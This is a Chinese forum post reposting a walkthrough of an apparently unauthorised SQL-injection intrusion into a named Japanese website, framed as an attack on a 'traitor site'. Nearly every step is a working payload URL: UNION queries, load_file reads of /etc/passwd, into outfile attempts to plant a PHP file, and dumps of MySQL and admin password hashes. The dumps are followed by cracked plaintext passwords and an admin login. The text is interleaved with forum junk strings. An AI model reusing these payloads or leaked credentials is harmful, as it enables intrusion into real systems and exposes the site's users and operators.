找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3821|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

% i; H1 n' ~+ W% s8 }
" s" X  u0 g& q, e4 H! I9 R- z0x01. 检测 www.zuaa.jp 收集数据! B/ d3 G1 i) o( x) ?9 A$ S

' n# v9 \$ H3 h$ A6 B# T) n# L' Y
' `5 P0 s' F- E: Vwhatweb
" [  J/ ~% ^3 P  r
2 I# A& w# V7 V: v8 y- U( E
, |% T! N6 H0 f2 i4 ?. y利用NMAP扫描
; R, u  w& [' ]
1 P1 U) p8 ~& o中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
, h4 j3 |$ y1 c0x02.找注入点% X) N6 {4 f2 ?0 W* K# u# ]
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390+ ?7 \; @8 S3 e$ H

  E* y! m5 r  i, {1 `2 s
# C' v" e. _* H8 q0x03.order by
4 U% X5 o- F" W, r' F! P, T( |             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
4 B; R- {- g5 n
9 M' Y/ C# H/ k! T4 G( @order by 28报错,order by 27正常
2 r+ S; l2 i2 V' y6 R% v  Z' u4 s3 T
$ F* K7 z. e5 \0x04.   union手动查询
) i% A& y& t' Lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: h/ p$ W2 b0 {添加到 27 时正常显示
2 J" i4 W, ]( D: z" Z& [; F; |- n4 \: g4 g6 F
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
4 b% e0 {1 f  }, ?5 M7 H% \% i! T& L1 z+ i) Q6 l0 {7 ?6 v
0x05. info:3 V, y" [; E. n7 j" S
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ' [7 a/ W7 c* b3 i
5 v$ j: X* |" h% \" T( U
user:            root@localhost
' r- A; U, i# u. Q2 b9 adatabase:    openpne9 V, M8 h  b/ p( l. e) c& F
version:      4.1.224 t7 Z/ H7 h# _. N% k" I2 A; ]7 t7 e9 w
os:             portbld-freebsd5.44 n) J9 \9 ?! F$ N) Q" t% m8 G
$ v! L, d# A# H( ]  O& @5 F- q
0x06. root用户& T& e, L7 q; q
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
8 L7 _: h1 E! _" S7 l/ U# S- a% ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 8 B, R9 m, z4 c7 w+ m
9 S0 x3 J8 a9 ^5 C  G3 G
通过工具转换5 P- f1 |. [9 r" }- h, w# y( ]

/ n' a  U. n6 Y8 k2 z9 y1 K中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
; B, c4 M# p7 H' ^3 m8 n
$ E+ C3 O; O' y# ]: g% a0 a0x07. 利用 into outfile! Z5 `3 d/ E. ?/ i2 u
全部都失败
1 _2 M! d" N+ V& lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
, _# [& n" m6 D# w1 @* i/ u( Z# D
9 C* @4 T. ~3 Z9 Y3 bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 4 ^& {( m7 `1 \! C8 a5 m
* `9 D' M7 r+ P5 ~  A8 {" h" N1 \
页面显示“MDB2 Error:syntax error”2 h! t1 i. C! W9 n

! y9 ]: W# d' ]0x08. 利用 mysql 4.1! w( H! d1 `0 d) m
猜常规表名,字段未果 工具 sqlmap
' `* c+ j/ F3 E1 M' u中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持" `4 y. @  U; C' f# Y. E1 Y  x
: R) X% w2 l! a

+ `2 i4 P0 F& U; l3 G8 _  Q/ J8 E1 Y9 S! p) f
0x09. 查找后台
9 d& r2 b3 L( l, D利用 现有的各种 后台工具尝试都不行# X, U! _( S" c- d

. x1 u( T4 f. g: w5 ~0x10.  MySL外联方法3 z3 p2 Y! L9 b; M
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行9 L, A( Z5 S& D5 ]) _2 B3 g
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
* c4 m" _4 u- H- \9 p4 X+ ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
- c3 g1 ~8 D% i  E  X8 P6 f3 \$ d: b/ M; b
这个可以在 www.cmd5.com 解密" w2 m( L( {- Q( j& O* W+ y* q
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009' C2 X8 J& J1 S* }+ ~7 Y
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97$ \, i5 w  Z6 T2 e8 I
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
; ^! O% A8 B+ W4 k( e; Lzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
( j4 F$ E% Z, h工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知/ K# x* G! S; ^4 T  }
# t- _! C3 s3 ~1 N% J1 ]
. o, [6 B( e- j0 Q( T$ m% [) X2 c
0x11. 网站突破3 x' e8 e' }/ ~+ n7 N$ l$ B( w! ^
发现网站的源程序 openpne, google 下载 openpne 源码/ O/ O2 Y0 o6 n' H

5 G: X7 R- i7 m; ~0 O! Y
* l5 R$ |" _, I: H" E0x12. 默认信息利用& U  ~, d% E) b& Q7 o/ _. L9 G7 F' Q
http://sns.zuaa.jp/?m=admin&a=page_login
4 q7 M  X1 Y. g$ V% A1 `  l0 q& b6 `5 }+ e+ w- r
表名 (c_admin_user) ,字段名(username,password)
' S" q/ ?' W, B* o5 ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user$ B& V7 o8 j5 l- p* A3 u% w1 x" z$ c
+ b& M% t) b  M
解密
( i9 ?( k" [, m9 V: C6 Y  n# ]zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
% o- C, s2 H4 @8 Dzuaajp:c0923ec5857796a393da99905008c176,          zju1897" L/ @& c, }5 j8 b
. \: |' t+ x- K. K
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持1 P9 o$ E. f/ y0 d! a, \; ]# {
0 S/ {5 s; }5 k* a
0x13. 登录后台
0 I* b8 B* ]9 Z# Q) V
$ r! f' n- e0 ^
9 J% c- |( r, W' R# [
. o- K# n9 o+ U+ Z1 R' R) p0 y0x14. 小结
+ [. s: d" X' P8 q) B. [  `利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
# y% k" ^" Y# q. B5 u感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点8 \( B$ Q# V# A) p' R
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain" g8 Y% Q# j0 l7 o
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持( b( [/ M( e: ]
$ S% k# }& P6 E" I% Q
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
: u% k6 E7 q+ \# ?: j

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表